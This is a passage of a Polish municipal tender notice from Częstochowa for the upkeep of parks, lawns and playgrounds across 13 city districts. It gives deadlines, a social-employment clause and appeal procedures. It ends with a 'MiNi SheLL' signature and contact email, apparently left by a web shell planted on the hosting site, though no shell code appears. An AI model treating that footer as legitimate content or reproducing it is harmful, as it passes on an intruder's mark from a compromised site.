c) W celu uwzględnienia wymagań art. 142 ust. 5 pkt 2 i 3 ustawy Prawo zamówień publicznych wartość umowy określona w ust. 1 będzie corocznie waloryzowana o  wskaźnik wzrostu cen towarów i usług konsumpcyjnych publikowany przez Prezesa  GUS za poprzedni rok kalendarzowy, począwszy od 1 stycznia 2016 roku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> lmaciejewska@czestochowa.um.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2015 godzina 09:30, miejsce: Urząd Miasta Częstochowy Biuro Obsługi Interesanta (parter), stanowisko Wydziału Nadzoru i Administracji, ul. Ślaska 11/13, 42-217 Częstochowa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Otwarcie ofert odbędzie się w dniu.12.03.2015 o godz. 10:00 w siedzibie zamawiającego w sali nr 108 ( I piętro).2.Specyfikacja istotnych warunków zamówienia będzie dostępna na stronie internetowej zamawiającego: http://bip.czestochowa.pl
Na tej stronie zamawiający będzie również zamieszczał pytania i odpowiedzi, zmiany SIWZ, odwołania dot. treści ogłoszenia oraz postanowień specyfikacji istotnych warunków zamówienia, ogłoszenie o wyborze najkorzystniejszej oferty.3. W prowadzonym postępowaniu porozumiewanie się będzie następowało w języku polskim 4.Zamawiający przewiduje udzielenie zamówień uzupełniających w zakresie zgodnym co do rodzaju z przedmiotem zamówienia.
5.DODATKOWE WYMAGANIA ZWIĄZANE Z REALIZACJĄ ZAMÓWIENIA - KLAUZULA SPOŁECZNA
Na podstawie art. 29 ust. 4 ustawy Prawo zamówień publicznych zamawiający będzie wymagał, aby wśród osób bezpośrednio uczestniczących w wykonywaniu zamówienia zatrudniona była w pełnym wymiarze czasu pracy  co najmniej 1 osoba bezrobotna na każdy rejon przyjęty do  utrzymania w ramach przedmiotowego zamówienia (razem 13 osób) na podstawie skierowania powiatowego urzędu pracy zgodnie z ustawą z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (j.t. Dz. U. z 2008 r. Nr 69, poz. 415, z późn. zm.) lub na postawie właściwego dokumentu kierującego bezrobotnych do pracodawcy wystawionego przez organ zajmujący się realizacją zadań z zakresu rynku pracy określony w analogicznych przepisach państwa członkowskiego UE lub Europejskiego Obszaru Gospodarczego.
Wykonawca, w przypadku uznania jego oferty za najkorzystniejszą, zobowiązany jest do:
- zatrudnienia co najmniej 1 osoby bezrobotnej na każdy przyjęty do utrzymania rejon, zgodnie z wymaganiami wskazanymi w niniejszym punkcie specyfikacji - w terminie nie dłuższym niż 14 dni od daty podpisania umowy nieprzerwanie przez cały okres trwania umowy,
- przedłożenia zamawiającemu zgłoszeń ofert pracy przedstawionych powiatowemu urzędowi pracy, odpisu skierowań osób bezrobotnych przez powiatowy urząd pracy do pracodawcy oraz umów o pracę - w terminie do 21 dni od daty podpisania umowy.
W przypadku rozwiązania stosunku pracy przez bezrobotnego lub przez pracodawcę (z winy bezrobotnego), wykonawca będzie obowiązany do zatrudnienia na to miejsce innego bezrobotnego w terminie do 14 dni od ustania stosunku pracy ze zwolnionym bezrobotnym. 
Zamawiający uprawniony będzie do kontroli spełniania przez wykonawcę wymagań dotyczących zatrudniania w/w osób. Na żądanie zamawiającego, wykonawca obowiązany będzie niezwłocznie udokumentować fakt zatrudniania w/w osób.
W przypadku niezatrudniania w sposób nieprzerwany przy realizacji zamówienia wymaganej przez zamawiającego liczby osób bezrobotnych, wykonawca będzie zobowiązany do zapłacenia zamawiającemu kary umownej, w wysokości iloczynu kwoty przeciętnego miesięcznego wynagrodzenia w sektorze przedsiębiorstw, ogłaszanego przez Prezesa Głównego Urzędu Statystycznego za okres bezpośrednio poprzedzający moment zakończenia umowy oraz liczby miesięcy w okresie realizacji zamówienia - za każdego niezatrudnionego bezrobotnego poniżej liczby wymaganej przez zamawiającego, chyba że wykonawca wykaże, że przedstawił zgłoszenie oferty pracy powiatowemu urzędowi pracy albo odpowiedniemu organowi zajmującemu się realizacją zadań z zakresu rynku pracy w państwie, w którym ten wykonawca ma siedzibę lub miejsce zamieszkania, a niezatrudnienie osób bezrobotnych nastąpiło z przyczyn nie leżących po jego stronie. Za przyczynę nieleżącą po stronie wykonawcy będzie w szczególności uznany brak osób bezrobotnych zdolnych do wykonania zamówienia na obszarze, w którym jest realizowane zamówienie i w okresie jego realizacji.
 6.W uzupełnieniu do punktu II.1.7) niniejszego ogłoszenia, Zamawiający informuje, że Wykonawca może złożyć ofertę najwyżej na dwa z wybranych przez siebie rejonów wymienionych w punkcie 3. specyfikacji.
Złożenie oferty na więcej niż dwa rejony będzie skutkowało odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, w zakresie wszystkich rejonów na które została złożona oferta.
7. Zamówienie jest objęte Porozumieniem w sprawie zamówień rządowych (GPA).
8. Numer ewidencyjny nadany sprawie przez instytucje zamawiającą: IZ.271.3.2015.
9. Jest to zamówienie o charakterze powtarzającym się.
9. Przewidywany czas kolejnych ogłoszeń: 2018 rok.
10. Procedury odwoławcze:
1) Organ odpowiedzialny za procedury odwoławcze:
Oficjalna nazwa: Krajowa Izba Odwoławcza przy Prezesie Urzędu Zamówień Publicznych
Adres pocztowy: ul. Postępu 17a
Miejscowość: Warszawa Kod pocztowy: 02-676 Państwo: Polska (PL)
Tel.: +48 224587801
E-mail: Faks: +48 224587800
Adres internetowy: (URL) http://www.uzp.gov.pl
Organ odpowiedzialny za procedury mediacyjne (jeżeli dotyczy)
2) Składanie odwołań: W prowadzonym postępowaniu mają zastosowanie przepisy zawarte w dziale VI ustawy Prawo zamówień publicznych - Środki ochrony prawnej.
Zastosowanie mają także następujące przepisy wykonawcze do ustawy Prawo zamówień publicznych, tj.:
a) Rozporządzenie Prezesa Rady Ministrów z dnia 22 marca 2010 r. w sprawie regulaminu postępowania przy rozpoznawaniu odwołań (j.t. Dz. U. z 2014 r., poz. 964);
b) Rozporządzenie Prezesa Rady Ministrów z dnia 15 marca 2010 r. w sprawie wysokości oraz sposobu pobierania wpisu od odwołania oraz rodzajów kosztów w postępowaniu odwoławczym i sposobu ich rozliczania (Dz. U. Nr 41, poz. 238).
3) Źródło, gdzie można uzyskać informacje na temat składania odwołań:
Oficjalna nazwa: Krajowa Izba Odwoławcza przy Prezesie Urzędu Zamówień Publicznych
Adres pocztowy: ul. Postępu 17a
Miejscowość: Warszawa Kod pocztowy: 02-676 Państwo: Polska (PL)
Tel.: +48 224587801
E-mail: Faks: +48 224587800
Adres internetowy: (URL) http://www.uzp.gov.pl
11. Ogłoszenie zostało przesłane do publikacji w Dzienniku Urzędowym Unii Europejskiej w dniu.12.03.2015 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rejon I	-      CENTRUM   	- 	pow. ok. 17 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach. Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 7, 7a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rejon II   	-	PÓŁNOC	-	pow. ok. 24 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 8, 8a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rejon III  - KOMPLEKS PROMENADA	- pow. ok. 26 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych (przeglądy, drobne naprawy) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 9, 9a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rejon IV  	-	GRABÓWKA	-	pow. ok. 22 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 10, 10a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rejon V    	-	ZAWODZIE	-	pow. ok. 17 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 11, 11a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Rejon VI  	-	RAKÓW	-	pow. ok. 21 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 12, 12a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Rejon VII 	- PARKI PODJASNOGÓRSKIE - pow. ok. 12 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 13, 13a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Rejon VIII -  DK-1  -  pow. ok. 19 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 14, 14a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rejon IX 	-	LAS ANIOŁOWSKI	-	pow. ok. 18 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 15, 15a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Rejon X        -   PARKITKA    -     pow. ok. 24 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 16, 16a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Rejon XI       -   STRADOM      -     pow. ok. 23 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 17, 17a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Rejon XII     -  WRZOSOWIAK    -     pow. ok. 20 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 18, 18a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Rejon XIII    -  WYCZERPY   -    pow. ok. 21 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje pielęgnację trawników, krzewów, rabat bylinowych, różanek, rabat jednorocznych oraz obsadzonych krzewami okrywowymi, młodych drzew wymagających pielęgnacji po posadzeniu itp. Oprócz prac pielęgnacyjnych zieleni w zakres zadania wchodzi grabienie liści oraz dbałość o techniczną sprawność urządzeń zabawowych i rekreacyjnych ( przeglądy, drobne naprawy ) a także stan nawierzchni warunkujące  bezpieczeństwo na placach zabaw zlokalizowanych na utrzymywanych terenach.Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr  5, 6, 19, 19a,  do specyfikacji. Powyższe dokumenty wraz ze siwz stanowią załączniki do ogłoszenia o przetargu i są dostępne na stronie internetowej zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com